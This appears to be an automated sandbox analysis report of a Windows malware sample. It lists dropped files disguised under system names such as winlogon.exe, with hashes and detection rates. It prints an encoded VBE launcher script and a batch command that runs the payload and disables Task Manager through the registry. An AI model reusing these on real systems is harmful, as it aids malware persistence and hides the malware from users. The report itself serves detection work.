                              Preview:e9oGjXZOROgMdHWoIDO8iRftvOOe4Rh5yCZEnyWylqz8mUaVMjwWNY9Me5VUJ4UArlYasRAUqZW2bgHax2SUeLsaDMjscCprVzRB6An4jcpxCGu8y4gQlAff27WfrS1nupgmOFexPYuCf5X6bl3igYFVTvI8nHMQlCCWkItsasAMPdA7kZEGYSHVjKSc6fKIMdad2BWT1LHxY2G0vLYNDG2S4rwZzQv5i2AvChEjDvONLU7rEbrvG6EGlIiLO6dkZMOf1VyOGzKS1pHktFVYjAymx4J383UGSnx8FcztncoRwwO6B7bIlEBZYmr7L4PNeD9N2JfRQmvGVg0BpN2BbLfNmXjdu1hsNbwswBD1cK28T4E2vqS7BOvShwlejBgYEC34tHOoJAiRTh3rSrrEjkq9pdKAZiSand3RBKIobnxBpd9A23M1TcyeW3OQ6OOksIoznmqIjDn6wpTLdKHgWaHLoZ4H51rNZMShzKXQMDSQy2rqjCwwHrORAdKOrjNrVagkWwWTx0UTI0WwrNh2F4Fr8BgW9I

                              C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\Windows Mail\8057c8f30c1a8e

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):89
                              Entropy (8bit):5.3141145771995
                              Encrypted:false
                              SSDEEP:3:kdswHbzamLL3NZPq/0HPoADSEVt:kd9beWL3nI0HPR+EVt
                              MD5:2BD7284831CEA0C7DCD251A484CE43C1
                              SHA1:37BCC1ABE155D57293AA5ED8FEA05C5BE0638A3D
                              SHA-256:15E4FF66C4C5A32186F1D5A5EC90AFEAACE5CC94E1E3B36DC422A42734CE7C70
                              SHA-512:B979C9B4F32D6DEBFB93D161EC78CB08E1B14AC0090FB30F753622776D87D25282CD70678F8F34806139148182A5A84C3FA1C85DD3BBFA48841D5A34728318E6
                              Malicious:false
                              Preview:w2v40cUicM6iByg4YCtINpAK7fXXpu7pO1Jfu3oSSEVjShIk2k1R6a1H2k6UE62rOQTKpAJfYa0JUa1aXxfF3psy9

                              C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\Windows Media Player\en-US\eddb19405b7ce1

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (606), with no line terminators
                              Category:dropped
                              Size (bytes):606
                              Entropy (8bit):5.876836736672927
                              Encrypted:false
                              SSDEEP:12:JRdQ2tsXqWgv0VCtC7CsiAypO30r5FwPf9gBqvPq0FK10LqOyN1u9:TdQIxWg5tCa8ktFw9XPM6LpSY9
                              MD5:76733DAB10E600F5A963603B6325A241
                              SHA1:CDADBC9F27C85F61C7A85F3126EC704F9625A062
                              SHA-256:792BFFE63AC29CDA756D5932CF8D0A42E9B00F3F8691F95DBC143D391D4825B4
                              SHA-512:1442B6F3EF687D0C7D371766D74C5EEDA7347540AB9D369259DE28EDFF808218A789BBFD2EB46DA78FB69841D942634C13AA214C8E8AD641E4944CBBF4A2EC3E
                              Malicious:false
                              Preview:kQ65u2HPCU403haw3LiERibDQq5CpEsJUGWQgPV9CpWkv2hj0ghhl7UCz2oE7Ej8mufxLKPnzjClL1RXIWMJgKiWvUbolQC7FX7BWuXpQ4rC4s08kR5k2abbMJB1tlCjgFfx3QBY9g2mcgbCdcEUVbEp6fyNsf5p1IfzMCETPglVhy9qr8XQgsOEA01XbxqdlNvTAmzbYvEy0tHIgIguIpII4azWKr1b0HuUDppFI62voZOQst0TR5V5EmZkxdQq3m7s9wE1dalLwXefMinb0iK4wyQaQESopL1BbfR6o9z0TJJqH4YOzz0VcC6KgolYI6gkfcDrQrx1sTlnpjSVqDz0VgjYiHZAYasWniLo0r8IC8mJbTe6VPsFHqP83pIIRxdSlO9HYof8EqyW4a6PmcoIrmO7SMvLjz0OfUiNTXirutAb12Ecs2gyIUk89CyL2TZP0j1j2t6O47Y8mxFaISdqTBGLtjOQjXyaTvkSBek96R4L5mWL7YCj0t6ycpzSfppgI8o0MwZnsdtBG5PHNCTLVOjkywzVoReQlYC68f8K8Y1XA4rhZsFcWeL3ZDCa6D9a9cZs2TJrDIM6XMk4ES56MB4HNJ

                              C:\Program Files (x86)\Windows Portable Devices\cc11b995f2a76d

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (471), with no line terminators
                              Category:dropped
                              Size (bytes):471
                              Entropy (8bit):5.858848168349901
                              Encrypted:false
                              SSDEEP:12:coEuzTLCeVo57dQAMv/CrYQv/OOVw6Vo1GWOqK8foh:coBzF6OpirYQnOO6Tgn9h
                              MD5:D2042EDE3DD2186A76FEBFE7B941D74B
                              SHA1:5D74AB421A4925A19F8973EE64A8869EC08CD7B5
                              SHA-256:0DFF5BF9EBE74F4FC30AC85A68616728C78C899F83A374B62B599A8CAD300AE6
                              SHA-512:E9D24F90FAB80E6F820AF36DC6AC25A6B952BB35F93ADEE8F6256736A5421C62F2394E2BF4E4AE85EAA11EEC36D8569275037AAB77E1C418C3C675DEB6A46CE2
                              Malicious:false
                              Preview:MdNIlwjtb7ItlAuaRkpZetolwO6GptcLQn9EcNL8hjCueV5VdTCHN48czmVX0cEre7d8Bp8DYq14q3HaSknVqU7VogP01yIFfVPh27TxV8tgDEv5f4EPysBJ9HTfaHLjhvYVokiUR09rlbSjvUV7u3RwTGhvoyXOwK8RqZR5Wu87sTiizutFwOzoelCiCxqccv5acB3VDakA5TDAh963ERbhVUwEXt2jDfe7YHGx0YCVoytKiBAD0wXLTXFHOy8ThA6ZyGmZ3ICqOG3gkmgVszsQITnBC8jCZsyo2TVbZkJstr6NdihmSmlrRpRfdkX5iAQgRPoRQE5IpAhbXZhdb7twHGWMC07yMOJsaa6O4PVNrcBRI0HED3dlReYK2bPZGG5b0yA7dSjLlfFoEFELt3vTuhb6BvWdA6GkhkaTzKkvUSAvYtGxXDqNVmqSWE5r6GKpYfHdouWjSA8chphSpiF

                              C:\Program Files (x86)\Windows Portable Devices\winlogon.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files\Windows Portable Devices\8057c8f30c1a8e

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (465), with no line terminators
                              Category:dropped
                              Size (bytes):465
                              Entropy (8bit):5.8778726036893385
                              Encrypted:false
                              SSDEEP:12:GYgXtJq6KQPjZgTHbSEz7zYEg+j18by0kpmKnVU/3R+:GYgdJT5jZgTzMaj18qpnVio
                              MD5:D879C4EEBE16752FC794E4BC6C0FD0B1
                              SHA1:F3201A6B4288D6266420B55115A570BC5C7FA8C9
                              SHA-256:7060278F3584A23F4799055D7394EAE0D2F1252DAF388015B82EACF104873490
                              SHA-512:1AD763ACDF1ADD7370F4891AF3B4486507E7C0A5738358E82DFF39C10D67C342D241BD5CC59DD4A09080D7E96124B272D71B0D9731194F10407C213CE5A901ED
                              Malicious:false
                              Preview:9QX4JJGYgdBUlbUzlVQ9ToSrcg67ak3uLn5zUD1WPllElg9dEgf9hrIU8qcmNJ86kRI8fffid3usCNF6hd23F3Neek0nlOJGnpdTXB7jB7fn7aSvkfFtQE0qEnd4o16OuoFWtwigfT2HYjhESFDFJZziyxOuhC4JAR2TU5By7iO7MtSeGZmix1FVyhh6hy9cYsHHrOtWDPIkK2WFetoHaVVJMgexYFQIjvidmLx1pQeiteK6LbbyK1CCX75Ku68899AZT2dT6wcK1xZrWhm6nc8stfFoQnHsRgjtdvmS8I1XZ2LkhNyMUCUhBSqywzCTpt2UNqOl5T8fkkS0TfGCz4XPLCsKFyfIFisqA1W19MQBEz6aAzeRtAduVmIL7DfHyzZB1m0cJODmnWLWFRKPTOZFE8UXsK45rJMOZ5jX8BHe61G8avGp3PxjZU63Rdt9TI4eJ66KswRRG4JN1

                              C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Recovery\38384e6a620884

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):101
                              Entropy (8bit):5.3632215073114855
                              Encrypted:false
                              SSDEEP:3:yqsu7diA0w01N6s2ZT1dSWGr4Oe2e1F:yqs0Z0HcTYT+
                              MD5:49720C956735A20B6A1F1DE803EA113C
                              SHA1:172C559A6CB30E0A0230887378E0CBFC523A3656
                              SHA-256:3AC9554CFF411DDD308379773444B06B8BBF496B1AF01469BAB78253B051BF8F
                              SHA-512:0361E472B15844A6D365A341F3083D662CF531D0D03208A20C1F0A5E16D06420C2BF44FCA861455130A9FC34560A7E9B4B1AD0676084B2E23080A0145006A4B4
                              Malicious:false
                              Preview:8pGfSILy6myez56G8fceKtB5gw4EFdIgH1LCqw98tUQPhcHIS5c0KU4PoK8fNGsddSW7u4aMgevzcvYEpvwKARWx65YgxeummxvOG

                              C:\Recovery\SearchApp.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\blockfont.exe.log

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1830
                              Entropy (8bit):5.3661116947161815
                              Encrypted:false
                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                              MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                              SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                              SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                              SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qwhJcOiWbbUoQMvwnJNr.exe.log

                              Download File
                              Process:C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1371
                              Entropy (8bit):5.366581410225247
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4j:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAM
                              MD5:289874BC03B0CB1B73F95A44E23B84A5
                              SHA1:F275F15181639F5CF9D17D52B662078C7982BBE1
                              SHA-256:0848F9D75F9CB57CB8505936C8D1806D4140BEFE2B169CD022ED97A6094B3F6F
                              SHA-512:227F67091FEF053586FA6DE1BA1FC2AD7631694401727C3A9F53ABBA6B46574EE72612827CBE91A39AD55EE5B5FE9286E7B54DD8262D6B35B0FE3ACBE24697B4
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Windows\RemotePackages\RemoteApps\8057c8f30c1a8e

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (690), with no line terminators
                              Category:dropped
                              Size (bytes):690
                              Entropy (8bit):5.90512361354523
                              Encrypted:false
                              SSDEEP:12:4IoKJvnL9kbEkvGaoR157aCnR3kMo90/z54PGwi89I1Ecvr8qGf:TNBnL4Fwbnif9Sz5TwjfeHGf
                              MD5:20037CD7CD49D0CDC61A7C76B4EE5F4B
                              SHA1:EC861A5052A0E2D1A42AB41066C853C1B9DF9A7B
                              SHA-256:23F20EFC79379B6F9354A76CF79100479A70CC91F39BD5D94646D81C3197B7AA
                              SHA-512:68E0A589F24B57BD7EDB71C07686E833E74DB8C49313F514AECB59AA1A4E8A2797D23CD5F7AAC6605CF6389AE3A2C4AE57AD9B0A524CE8C6DCF7B22F1CB09A33
                              Malicious:false
                              Preview:H4VnNvqhnCYAMZeQNjhxlUZLuUNToqDZdRI93QrWQNl0aO441mYClzExeJ32hX3698h5RfX62KhYsivfZSbBRAynMVetXyy2Up1bq8mWPcKaSqE5YXdP61o8K3t6AnjDWoEDqTyapEwzzXVgQiV9Uj5cA2RxPqVl3GDnlBOEiCj1FzJwhNpbSksxslDyBBL9sK6sTs4PTQaS9EXLteQBA4TTYQ498aDh0kI42bdySaHBJaxoO1EguJ8y0nUDy4R3N2cZ5cSSBbtkwSJ7cPvGWgwqlUEOGaAXJOxQ8YtviwfSaYBieWkiJKhrFvxkYELlbVaie29Dg9hjAdQMTfuuzcO8rGKMkIXek41E8cElWgBJm7qmelR2Tbw9Hb1XrxdYlD8GmMO0bJXSaEWtZis90fLJH26glq4jDnij8k9SWbaKDdiDFH8IEdhG1z8uPsOvPyOxfwvzjanZEBGoT2besvejFbrJmPCnMp5PPvhSWJjo0HC0tUaWRuDdTorEFlMTX9NYG0YiVIIjL0t8Z1aRzqWcmb5kEdNu6QR04nu252BImdRd5spOL5eqnuwo5ye25Xm5i2EvGhW6pNzIJcoVx8jAvkMJ0F7HYJNO1W4Co3HnjhBa4ofdJIE6ylJ7q45BkOif9lRxhmq315bOivOMkd7PEQaPM7Vu8GCU8fbTWr6gcKF2K5

                              C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe

                              Download File
                              Process:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):213
                              Entropy (8bit):5.78571368925169
                              Encrypted:false
                              SSDEEP:6:GcgwqK+NkLzWbHa/JUrFnBaORbM5nCcgjO0+ObphWs:GuMCzWLauhBaORbQCjy0+ObH1
                              MD5:AA5D2DCB34512F41ECEEF1887AD39F4A
                              SHA1:68A4B9F4B74966CCB17C078CA451D83B1647398A
                              SHA-256:FE304710B13AF9DED763440E7EE9DD150B044788F723675823BF41AF11707620
                              SHA-512:5BDC29D1518140A0A299D0117BD05EFEABAFF4553BADAF9AF916AD0FA104CAF56C9AD9115C90509366BCBB6B66DF567C451A60EC5218770A1CDF8F04F7A8DA70
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:#@~^vAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zd.D7+Dk+kdkKxhW.kOGMzW72(xAFX+p9S.$? 4COr~~!B~0mVdnsjwAAA==^#~@.

                              C:\serversessionmonitor\blockfont.exe

                              Download File
                              Process:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat

                              Download File
                              Process:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):151
                              Entropy (8bit):4.943167098000957
                              Encrypted:false
                              SSDEEP:3:I5GHqIcMtOWmdAZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:I0qi4CMTStuH1jhRiI36BY
                              MD5:6693AB77D25499B76854456E925BE0B2
                              SHA1:E686AE9DD5CBC8FAA019983B84D2CC83900A79AD
                              SHA-256:9582B41CC7E6B437271BF9B296C4DA97FD59AE90E98FB2E0F80CE7C4D8C73334
                              SHA-512:81F3AB6668F38DDBD4DD39D22A927F45DF85DED8EDB56B6EF86AC340B7C61A03C0812743CEC6C30E409F1E967662D0C91B13AB58E809AF147571300EDF271D4A
                              Malicious:false
                              Preview:"C:\serversessionmonitor\blockfont.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.978724276038117
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.97%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:5P9EdUgv5r.exe
                              File size:1'577'715 bytes
                              MD5:1f70e167b93d471af9daf333145db4cd
                              SHA1:b7c1afc111a98055b28c94f62599ff33f41ced24
                              SHA256:9fbc9f10ad8bc902a7a847d76b9792ac9f995555e856824f96fd04b7290b5aed
                              SHA512:652ab9c08079711d2d3aa344e78ee3344113e56c62986555215d5669627a773055cc43f851af96ef98940709eecbb355dc12ab24061b3e7452d48580d95c3dad
                              SSDEEP:24576:U2G/nvxW3Ww0tdAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4c:UbA30O2vGd1onZGCP6Oz
                              TLSH:74758C027F548A12F1191637D2EF850447B0EC516AAAE71B7EBE376E95123937C0CACB
